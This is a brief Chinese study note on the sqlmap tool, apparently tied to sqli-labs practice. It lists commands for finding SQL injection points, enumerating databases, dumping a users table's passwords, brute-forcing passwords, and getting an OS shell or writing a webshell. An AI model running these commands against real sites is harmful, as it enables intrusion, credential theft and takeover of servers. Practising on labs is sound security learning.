sqlmap学习
get类型:
1.查看是否有注入点:sqlmap -u 网址
2.出数据库名:sqlmap -u 网址 –dbs
3.出数据库的表名:sqlmap -u 网址 -D security –tables
4.出数据库的列名:sqlmap -u 网址 -D security -T users –columns
5.出数据:sqlmap -u -D security -T users -C id,password,username –dump
aaa
POST类型
使用burp抓包,将请求内容保存在txt文件中(或者使用-u 网址 –data ‘data’来代替)
1.使用sqlmap检查是否存在注入点:sqlmap -r 文档位置
2.使用sqlmap爆库名:sqlmap -r 文档位置 –dbs
设置线程
这里需要先去配置文件改一下最大线程
然后再命令的最后加上 –threads+数字
查看当前用户以及是否是dba用户
–current-user 查看用户
–is-dba 查看是否是dba
–hostname 查看主机名
–password暴力破解用户名密码
枚举dbms的权限
–privileges –role
爬取url:
–crawl=num(1,2,3,4:要爬取的深度)
–os-shell
https://mp.weixin.qq.com/s/f-iIm4u5CJo2niMgTor2EQ
1.写入shell的前提
root权限,需要写文件的权限
select group_concat(user,0x3a,file_priv) from mysql.user; |
以下的就和在sqli-labs时写马的条件是一样的
需要知道绝对路径
–os-shell
sqlmap各种脚本使用说明:https://xz.aliyun.com/t/2746